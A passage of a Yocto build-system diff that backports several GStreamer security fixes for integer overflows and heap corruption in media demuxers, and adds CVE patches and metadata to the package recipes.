+-      if (newbuf == NULL) {
+-        out_size = sizeof (Wavpack4Header) + blocksize;
+-        newbuf = gst_buffer_new_allocate (NULL, out_size, NULL);
++      g_assert (newbuf == NULL);
+ 
+-        gst_buffer_copy_into (newbuf, *buf,
+-            GST_BUFFER_COPY_TIMESTAMPS | GST_BUFFER_COPY_FLAGS, 0, -1);
++      newbuf =
++          gst_buffer_new_allocate (NULL, WAVPACK4_HEADER_SIZE + blocksize,
++          NULL);
++      gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
++      outdata = outmap.data;
++
++      outdata[0] = 'w';
++      outdata[1] = 'v';
++      outdata[2] = 'p';
++      outdata[3] = 'k';
++      outdata += 4;
++
++      GST_WRITE_UINT32_LE (outdata, blocksize + WAVPACK4_HEADER_SIZE - 8);
++      GST_WRITE_UINT16_LE (outdata + 4, wvh.version);
++      GST_WRITE_UINT8 (outdata + 6, wvh.track_no);
++      GST_WRITE_UINT8 (outdata + 7, wvh.index_no);
++      GST_WRITE_UINT32_LE (outdata + 8, wvh.total_samples);
++      GST_WRITE_UINT32_LE (outdata + 12, wvh.block_index);
++      GST_WRITE_UINT32_LE (outdata + 16, block_samples);
++      GST_WRITE_UINT32_LE (outdata + 20, flags);
++      GST_WRITE_UINT32_LE (outdata + 24, crc);
++      outdata += 28;
++
++      memcpy (outdata, data, blocksize);
+ 
+-        outpos = 0;
+-        gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
+-        outdata = outmap.data;
+-      } else {
+-        gst_buffer_unmap (newbuf, &outmap);
+-        out_size += sizeof (Wavpack4Header) + blocksize;
+-        gst_buffer_set_size (newbuf, out_size);
+-        gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
+-        outdata = outmap.data;
+-      }
++      gst_buffer_unmap (newbuf, &outmap);
++      gst_adapter_push (adapter, newbuf);
++      newbuf = NULL;
+ 
+-      outdata[outpos] = 'w';
+-      outdata[outpos + 1] = 'v';
+-      outdata[outpos + 2] = 'p';
+-      outdata[outpos + 3] = 'k';
+-      outpos += 4;
+-
+-      GST_WRITE_UINT32_LE (outdata + outpos,
+-          blocksize + sizeof (Wavpack4Header) - 8);
+-      GST_WRITE_UINT16_LE (outdata + outpos + 4, wvh.version);
+-      GST_WRITE_UINT8 (outdata + outpos + 6, wvh.track_no);
+-      GST_WRITE_UINT8 (outdata + outpos + 7, wvh.index_no);
+-      GST_WRITE_UINT32_LE (outdata + outpos + 8, wvh.total_samples);
+-      GST_WRITE_UINT32_LE (outdata + outpos + 12, wvh.block_index);
+-      GST_WRITE_UINT32_LE (outdata + outpos + 16, block_samples);
+-      GST_WRITE_UINT32_LE (outdata + outpos + 20, flags);
+-      GST_WRITE_UINT32_LE (outdata + outpos + 24, crc);
+-      outpos += 28;
+-
+-      memmove (outdata + outpos, data, blocksize);
+-      outpos += blocksize;
+       data += blocksize;
+       size -= blocksize;
+     }
+     gst_buffer_unmap (*buf, &map);
+-    gst_buffer_unref (*buf);
+ 
+-    if (newbuf)
+-      gst_buffer_unmap (newbuf, &outmap);
++    newbuf = gst_adapter_take_buffer (adapter, gst_adapter_available (adapter));
++    g_object_unref (adapter);
+ 
++    gst_buffer_copy_into (newbuf, *buf,
++        GST_BUFFER_COPY_TIMESTAMPS | GST_BUFFER_COPY_FLAGS, 0, -1);
++    gst_buffer_unref (*buf);
+     *buf = newbuf;
++
+     audiocontext->wvpk_block_index += block_samples;
+   }
+ 
+diff --git a/gst/matroska/matroska-ids.h b/gst/matroska/matroska-ids.h
+index 429213f77..8d4a685a9 100644
+--- a/gst/matroska/matroska-ids.h
++++ b/gst/matroska/matroska-ids.h
+@@ -688,6 +688,8 @@ typedef struct _Wavpack4Header {
+   guint32 crc;           /* crc for actual decoded data                    */
+ } Wavpack4Header;
+ 
++#define WAVPACK4_HEADER_SIZE (32)
++
+ typedef enum {
+   GST_MATROSKA_TRACK_ENCODING_SCOPE_FRAME = (1<<0),
+   GST_MATROSKA_TRACK_ENCODING_SCOPE_CODEC_DATA = (1<<1),
+-- 
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch
new file mode 100644
index 0000000000..d3de2d5014
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch
@@ -0,0 +1,44 @@
+From 02174790726dd20a5c73ce2002189bf240ad4fe0 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 3 Mar 2021 11:31:52 +0200
+Subject: [PATCH] matroskademux: Initialize track context out parameter to NULL
+ before parsing
+
+Various error return paths don't set it to NULL and callers are only
+checking if the pointer is NULL. As it's allocated on the stack this
+usually contains random stack memory, and more often than not the memory
+of a previously parsed track.
+
+This then causes all kinds of memory corruptions further down the line.
+
+Thanks to Natalie Silvanovich for reporting.
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues/858
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/merge_requests/903>
+
+Upstream-Status: Backport [
+https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/commit/02174790726dd20a5c73ce2002189bf240ad4fe0?merge_request_iid=903 ]
+CVE: CVE-2021-3498
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ gst/matroska/matroska-demux.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
+index 4d0234743..467815986 100644
+--- a/gst/matroska/matroska-demux.c
++++ b/gst/matroska/matroska-demux.c
+@@ -692,6 +692,8 @@ gst_matroska_demux_parse_stream (GstMatroskaDemux * demux, GstEbmlRead * ebml,
+ 
+   DEBUG_ELEMENT_START (demux, ebml, "TrackEntry");
+ 
++  *dest_context = NULL;
++
+   /* start with the master */
+   if ((ret = gst_ebml_read_master (ebml, &id)) != GST_FLOW_OK) {
+     DEBUG_ELEMENT_STOP (demux, ebml, "TrackEntry", ret);
+-- 
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch
new file mode 100644
index 0000000000..ee33c5564d
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch
@@ -0,0 +1,59 @@
+From cf887f1b8e228bff6e19829e6d03995d70ad739d Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 18 May 2022 10:23:15 +0300
+Subject: [PATCH] matroskademux: Avoid integer-overflow resulting in heap
+ corruption in WavPack header handling code
+
+blocksize + WAVPACK4_HEADER_SIZE might overflow gsize, which then
+results in allocating a very small buffer. Into that buffer blocksize
+data is memcpy'd later which then causes out of bound writes and can
+potentially lead to anything from crashes to remote code execution.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: CVE-2022-1920
+
+https://gstreamer.freedesktop.org/security/sa-2022-0004.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1226
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2612>
+
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/0df0dd7fe388174e4835eda4526b47f470a56370
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ .../gst/matroska/matroska-demux.c     | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
+index 64cc6be60be..01d754c3eb9 100644
+--- a/gst/matroska/matroska-demux.c
++++ b/gst/matroska/matroska-demux.c
+@@ -3933,7 +3933,8 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+   } else {
+     guint8 *outdata = NULL;
+     gsize buf_size, size;
+-    guint32 block_samples, flags, crc, blocksize;
++    guint32 block_samples, flags, crc;
++    gsize blocksize;
+     GstAdapter *adapter;
+ 
+     adapter = gst_adapter_new ();
+@@ -3974,6 +3975,13 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+         return GST_FLOW_ERROR;
+       }
+ 
++      if (blocksize > G_MAXSIZE - WAVPACK4_HEADER_SIZE) {
++        GST_ERROR_OBJECT (element, "Too big wavpack buffer");
++        gst_buffer_unmap (*buf, &map);
++        g_object_unref (adapter);
++        return GST_FLOW_ERROR;
++      }
++
+       g_assert (newbuf == NULL);
+ 
+       newbuf =
+-- 
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch
new file mode 100644
index 0000000000..99dbb2b1b0
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch
@@ -0,0 +1,69 @@
+From f503caad676971933dc0b52c4b313e5ef0d6dbb0 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 18 May 2022 12:00:48 +0300
+Subject: [PATCH] avidemux: Fix integer overflow resulting in heap corruption
+ in DIB buffer inversion code
+
+Check that width*bpp/8 doesn't overflow a guint and also that
+height*stride fits into the provided buffer without overflowing.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: CVE-2022-1921
+
+See https://gstreamer.freedesktop.org/security/sa-2022-0001.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1224
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2608>
+
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/f503caad676971933dc0b52c4b313e5ef0d6dbb0
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ .../gst/avi/gstavidemux.c      | 17 ++++++++++++++---
+ 1 file changed, 14 insertions(+), 3 deletions(-)
+
+diff --git a/gst/avi/gstavidemux.c b/gst/avi/gstavidemux.c
+index eafe865494c..0d18a6495c7 100644
+--- a/gst/avi/gstavidemux.c
++++ b/gst/avi/gstavidemux.c
+@@ -4973,8 +4973,8 @@ swap_line (guint8 * d1, guint8 * d2, guint8 * tmp, gint bytes)
+ static GstBuffer *
+ gst_avi_demux_invert (GstAviStream * stream, GstBuffer * buf)
+ {
+-  gint y, w, h;
+-  gint bpp, stride;
++  guint y, w, h;
++  guint bpp, stride;
+   guint8 *tmp = NULL;
+   GstMapInfo map;
+   guint32 fourcc;
+@@ -5001,12 +5001,23 @@ gst_avi_demux_invert (GstAviStream * stream, GstBuffer * buf)
+   h = stream->strf.vids->height;
+   w = stream->strf.vids->width;
+   bpp = stream->strf.vids->bit_cnt ? stream->strf.vids->bit_cnt : 8;
++
++  if ((guint64) w * ((guint64) bpp / 8) > G_MAXUINT - 4) {
++    GST_WARNING ("Width x stride overflows");
++    return buf;
++  }
++
++  if (w == 0 || h == 0) {
++    GST_WARNING ("Zero width or height");
++    return buf;
++  }
++
+   stride = GST_ROUND_UP_4 (w * (bpp / 8));
+ 
+   buf = gst_buffer_make_writable (buf);
+ 
+   gst_buffer_map (buf, &map, GST_MAP_READWRITE);
+-  if (map.size < (stride * h)) {
++  if (map.size < ((guint64) stride * (guint64) h)) {
+     GST_WARNING ("Buffer is smaller than reported Width x Height x Depth");
+     gst_buffer_unmap (buf, &map);
+     return buf;
+-- 
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch
new file mode 100644
index 0000000000..ebffbc473d
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch
@@ -0,0 +1,214 @@
+From ad6012159acf18c6b5c0f4edf037e8c9a2dbc966 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 18 May 2022 11:24:37 +0300
+Subject: [PATCH] matroskademux: Fix integer overflows in zlib/bz2/etc
+ decompression code
+
+Various variables were of smaller types than needed and there were no
+checks for any overflows when doing additions on the sizes. This is all
+checked now.
+
+In addition the size of the decompressed data is limited to 120MB now as
+any larger sizes are likely pathological and we can avoid out of memory
+situations in many cases like this.
+
+Also fix a bug where the available output size on the next iteration in
+the zlib/bz2 decompression code was provided too large and could
+potentially lead to out of bound writes.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: CVE-2022-1922, CVE-2022-1923, CVE-2022-1924, CVE-2022-1925
+
+https://gstreamer.freedesktop.org/security/sa-2022-0002.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1225
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2610>
+
+CVE: CVE-2022-1922 CVE-2022-1923 CVE-2022-1924 CVE-2022-1925
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/ad6012159acf18c6b5c0f4edf037e8c9a2dbc966
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ .../gst/matroska/matroska-read-common.c       | 76 +++++++++++++++----
+ 1 file changed, 61 insertions(+), 15 deletions(-)
+
+diff --git a/gst/matroska/matroska-read-common.c b/gst/matroska/matroska-read-common.c
+index eb317644cc5..6fadbba9567 100644
+--- a/gst/matroska/matroska-read-common.c
++++ b/gst/matroska/matroska-read-common.c
+@@ -70,6 +70,10 @@ typedef struct
+   gboolean audio_only;
+ } TargetTypeContext;
+ 
++/* 120MB as maximum decompressed data size. Anything bigger is likely
++ * pathological, and like this we avoid out of memory situations in many cases
++ */
++#define MAX_DECOMPRESS_SIZE (120 * 1024 * 1024)
+ 
+ static gboolean
+ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+@@ -77,19 +81,23 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+     GstMatroskaTrackCompressionAlgorithm algo)
+ {
+   guint8 *new_data = NULL;
+-  guint new_size = 0;
++  gsize new_size = 0;
+   guint8 *data = *data_out;
+-  guint size = *size_out;
++  const gsize size = *size_out;
+   gboolean ret = TRUE;
+ 
++  if (size > G_MAXUINT32) {
++    GST_WARNING ("too large compressed data buffer.");
++    ret = FALSE;
++    goto out;
++  }
++
+   if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_ZLIB) {
+ #ifdef HAVE_ZLIB
+     /* zlib encoded data */
+     z_stream zstream;
+-    guint orig_size;
+     int result;
+ 
+-    orig_size = size;
+     zstream.zalloc = (alloc_func) 0;
+     zstream.zfree = (free_func) 0;
+     zstream.opaque = (voidpf) 0;
+@@ -99,8 +107,8 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+       goto out;
+     }
+     zstream.next_in = (Bytef *) data;
+-    zstream.avail_in = orig_size;
+-    new_size = orig_size;
++    zstream.avail_in = size;
++    new_size = size;
+     new_data = g_malloc (new_size);
+     zstream.avail_out = new_size;
+     zstream.next_out = (Bytef *) new_data;
+@@ -114,10 +122,18 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+         break;
+       }
+ 
++      if (new_size > G_MAXSIZE - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
++        GST_WARNING ("too big decompressed data");
++        result = Z_MEM_ERROR;
++        break;
++      }
++
+       new_size += 4096;
+       new_data = g_realloc (new_data, new_size);
+       zstream.next_out = (Bytef *) (new_data + zstream.total_out);
+-      zstream.avail_out += 4096;
++      /* avail_out is an unsigned int */
++      g_assert (new_size - zstream.total_out <= G_MAXUINT);
++      zstream.avail_out = new_size - zstream.total_out;
+     } while (zstream.avail_in > 0);
+ 
+     if (result != Z_STREAM_END) {
+@@ -137,13 +153,11 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ #ifdef HAVE_BZ2
+     /* bzip2 encoded data */
+     bz_stream bzstream;
+-    guint orig_size;
+     int result;
+ 
+     bzstream.bzalloc = NULL;
+     bzstream.bzfree = NULL;
+     bzstream.opaque = NULL;
+-    orig_size = size;
+ 
+     if (BZ2_bzDecompressInit (&bzstream, 0, 0) != BZ_OK) {
+       GST_WARNING ("bzip2 initialization failed.");
+@@ -152,8 +166,8 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+     }
+ 
+     bzstream.next_in = (char *) data;
+-    bzstream.avail_in = orig_size;
+-    new_size = orig_size;
++    bzstream.avail_in = size;
++    new_size = size;
+     new_data = g_malloc (new_size);
+     bzstream.avail_out = new_size;
+     bzstream.next_out = (char *) new_data;
+@@ -167,17 +181,31 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+         break;
+       }
+ 
++      if (new_size > G_MAXSIZE - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
++        GST_WARNING ("too big decompressed data");
++        result = BZ_MEM_ERROR;
++        break;
++      }
++
+       new_size += 4096;
+       new_data = g_realloc (new_data, new_size);
+-      bzstream.next_out = (char *) (new_data + bzstream.total_out_lo32);
+-      bzstream.avail_out += 4096;
++      bzstream.next_out =
++          (char *) (new_data + ((guint64) bzstream.total_out_hi32 << 32) +
++          bzstream.total_out_lo32);
++      /* avail_out is an unsigned int */
++      g_assert (new_size - ((guint64) bzstream.total_out_hi32 << 32) +
++          bzstream.total_out_lo32 <= G_MAXUINT);
++      bzstream.avail_out =
++          new_size - ((guint64) bzstream.total_out_hi32 << 32) +
++          bzstream.total_out_lo32;
+     } while (bzstream.avail_in > 0);
+ 
+     if (result != BZ_STREAM_END) {
+       ret = FALSE;
+       g_free (new_data);
+     } else {
+-      new_size = bzstream.total_out_lo32;
++      new_size =
++          ((guint64) bzstream.total_out_hi32 << 32) + bzstream.total_out_lo32;
+     }
+     BZ2_bzDecompressEnd (&bzstream);
+ 
+@@ -189,7 +217,13 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+   } else if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_LZO1X) {
+     /* lzo encoded data */
+     int result;
+-    int orig_size, out_size;
++    gint orig_size, out_size;
++
++    if (size > G_MAXINT) {
++      GST_WARNING ("too large compressed data buffer.");
++      ret = FALSE;
++      goto out;
++    }
+ 
+     orig_size = size;
+     out_size = size;
+@@ -203,6 +237,11 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+       result = lzo1x_decode (new_data, &out_size, data, &orig_size);
+ 
+       if (orig_size > 0) {
++        if (new_size > G_MAXINT - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
++          GST_WARNING ("too big decompressed data");
++          result = LZO_ERROR;
++          break;
++        }
+         new_size += 4096;
+         new_data = g_realloc (new_data, new_size);
+       }
+@@ -221,6 +260,13 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+   } else if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_HEADERSTRIP) {
+     /* header stripped encoded data */
+     if (enc->comp_settings_length > 0) {
++      if (size > G_MAXSIZE - enc->comp_settings_length
++          || size + enc->comp_settings_length > MAX_DECOMPRESS_SIZE) {
++        GST_WARNING ("too big decompressed data");
++        ret = FALSE;
++        goto out;
++      }
++
+       new_data = g_malloc (size + enc->comp_settings_length);
+       new_size = size + enc->comp_settings_length;
+ 
+-- 
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch
new file mode 100644
index 0000000000..f4d38c270e
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch
@@ -0,0 +1,60 @@
+From 14d306da6da51a762c4dc701d161bb52ab66d774 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Mon, 30 May 2022 10:15:37 +0300
+Subject: [PATCH] qtdemux: Fix integer overflows in zlib decompression code
+
+Various variables were of smaller types than needed and there were no
+checks for any overflows when doing additions on the sizes. This is all
+checked now.
+
+In addition the size of the decompressed data is limited to 200MB now as
+any larger sizes are likely pathological and we can avoid out of memory
+situations in many cases like this.
+
+Also fix a bug where the available output size on the next iteration in
+the zlib decompression code was provided too large and could
+potentially lead to out of bound writes.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: tbd
+
+https://gstreamer.freedesktop.org/security/sa-2022-0003.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1225
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2610>
+
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/14d306da6da51a762c4dc701d161bb52ab66d774
+CVE: CVE-2022-2122
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ gst/isomp4/qtdemux.c | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/gst/isomp4/qtdemux.c b/gst/isomp4/qtdemux.c
+index 7cc346b1e63..97ba0799a8d 100644
+--- a/gst/isomp4/qtdemux.c
++++ b/gst/isomp4/qtdemux.c
+@@ -7905,10 +7905,16 @@ qtdemux_inflate (void *z_buffer, guint z_length, guint * length)
+       break;
+     }
+ 
++    if (*length > G_MAXUINT - 4096 || *length > QTDEMUX_MAX_SAMPLE_INDEX_SIZE) {
++      GST_WARNING ("too big decompressed data");
++      ret = Z_MEM_ERROR;
++      break;
++    }
++
+     *length += 4096;
+     buffer = (guint8 *) g_realloc (buffer, *length);
+     z.next_out = (Bytef *) (buffer + z.total_out);
+-    z.avail_out += 4096;
++    z.avail_out += *length - z.total_out;
+   } while (z.avail_in > 0);
+ 
+   if (ret != Z_STREAM_END) {
+-- 
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
index 75dd029109..831a317a82 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
@@ -1,9 +1,19 @@
 require gstreamer1.0-plugins-common.inc
 
+DESCRIPTION = "'Good' GStreamer plugins"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues"
+
 SRC_URI = " \
             https://gstreamer.freedesktop.org/src/gst-plugins-good/gst-plugins-good-${PV}.tar.xz \
             file://0001-qmlgl-ensure-Qt-defines-GLsync-to-fix-compile-on-som.patch \
             file://0001-qt-include-ext-qt-gstqtgl.h-instead-of-gst-gl-gstglf.patch \
+            file://CVE-2021-3497.patch \
+            file://CVE-2021-3498.patch \
+            file://CVE-2022-1920.patch \
+            file://CVE-2022-1921.patch \
+            file://CVE-2022-1922-1923-1924-1925.patch \
+            file://CVE-2022-2122.patch \
             "
 
 SRC_URI[md5sum] = "c79b6c2f8eaadb2bb66615b694db399e"
@@ -30,6 +40,8 @@ X11DEPENDS = "virtual/libx11 libsm libxrender libxfixes libxdamage"
 X11ENABLEOPTS = "-Dximagesrc=enabled -Dximagesrc-xshm=enabled -Dximagesrc-xfixes=enabled -Dximagesrc-xdamage=enabled"
 X11DISABLEOPTS = "-Dximagesrc=disabled -Dximagesrc-xshm=disabled -Dximagesrc-xfixes=disabled -Dximagesrc-xdamage=disabled"
 
+QT5WAYLANDDEPENDS = "${@bb.utils.contains("DISTRO_FEATURES", "wayland", "qtwayland", "", d)}"
+
 PACKAGECONFIG[bz2]        = "-Dbz2=enabled,-Dbz2=disabled,bzip2"
 PACKAGECONFIG[cairo]      = "-Dcairo=enabled,-Dcairo=disabled,cairo"
 PACKAGECONFIG[dv1394]     = "-Ddv1394=enabled,-Ddv1394=disabled,libiec61883 libavc1394 libraw1394"
@@ -44,7 +56,7 @@ PACKAGECONFIG[libpng]     = "-Dpng=enabled,-Dpng=disabled,libpng"
 PACKAGECONFIG[libv4l2]    = "-Dv4l2-libv4l2=enabled,-Dv4l2-libv4l2=disabled,v4l-utils"
 PACKAGECONFIG[mpg123]     = "-Dmpg123=enabled,-Dmpg123=disabled,mpg123"
 PACKAGECONFIG[pulseaudio] = "-Dpulse=enabled,-Dpulse=disabled,pulseaudio"
-PACKAGECONFIG[qt5]        = "-Dqt5=enabled,-Dqt5=disabled,qtbase qtdeclarative qtbase-native"
+PACKAGECONFIG[qt5]        = "-Dqt5=enabled,-Dqt5=disabled,qtbase qtdeclarative qtbase-native ${QT5WAYLANDDEPENDS}"
 PACKAGECONFIG[soup]       = "-Dsoup=enabled,-Dsoup=disabled,libsoup-2.4"
 PACKAGECONFIG[speex]      = "-Dspeex=enabled,-Dspeex=disabled,speex"
 PACKAGECONFIG[taglib]     = "-Dtaglib=enabled,-Dtaglib=disabled,taglib"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
index d9ec82d887..afde9a013d 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
@@ -1,5 +1,9 @@
 require gstreamer1.0-plugins-common.inc
 
+DESCRIPTION = "'Ugly GStreamer plugins"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-ugly/-/issues"
+
 LIC_FILES_CHKSUM = "file://COPYING;md5=a6f89e2100d9b6cdffcea4f398e37343 \
                     file://tests/check/elements/xingmux.c;beginline=1;endline=21;md5=4c771b8af188724855cb99cadd390068"
 
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
index 14b34a2808..9c7f0e078c 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
@@ -1,4 +1,6 @@
 SUMMARY = "Python bindings for GStreamer 1.0"
+DESCRIPTION = "GStreamer Python binding overrides (complementing the bindings \
+provided by python-gi) "
 HOMEPAGE = "http://cgit.freedesktop.org/gstreamer/gst-python/"
 SECTION = "multimedia"
 
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb
index 5f1b1d44fa..ed51a5693e 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb
@@ -29,3 +29,5 @@ GIR_MESON_DISABLE_FLAG = "disabled"
 
 # Starting with 1.8.0 gst-rtsp-server includes dependency-less plugins as well
 require gstreamer1.0-plugins-packaging.inc
+
+CVE_PRODUCT += "gst-rtsp-server"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
index 9d9b1b8757..af9b2c5a97 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
@@ -1,4 +1,5 @@
 SUMMARY = "VA-API support to GStreamer"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
 DESCRIPTION = "gstreamer-vaapi consists of a collection of VA-API \
 based plugins for GStreamer and helper libraries: `vaapidecode', \
 `vaapiconvert', and `vaapisink'."
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch
new file mode 100644
index 0000000000..e32f3c101f
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch
@@ -0,0 +1,33 @@
+From 1db36347d05d88835519368442e9aa89c64091ad Mon Sep 17 00:00:00 2001
+From: Seungha Yang <seungha@centricular.com>
+Date: Tue, 15 Sep 2020 00:54:58 +0900
+Subject: [PATCH] tests: seek: Don't use too strict timeout for validation
+
+Expected segment-done message might not be seen within expected
+time if system is not powerful enough.
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/625>
+
+Upstream-Status: Backport [https://cgit.freedesktop.org/gstreamer/gstreamer/commit?id=f44312ae5d831438fcf8041162079c65321c588c]
+Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
+Signed-off-by: Jose Quaresma <quaresma.jose@gmail.com>
+---
+ tests/check/pipelines/seek.c | 2 +-
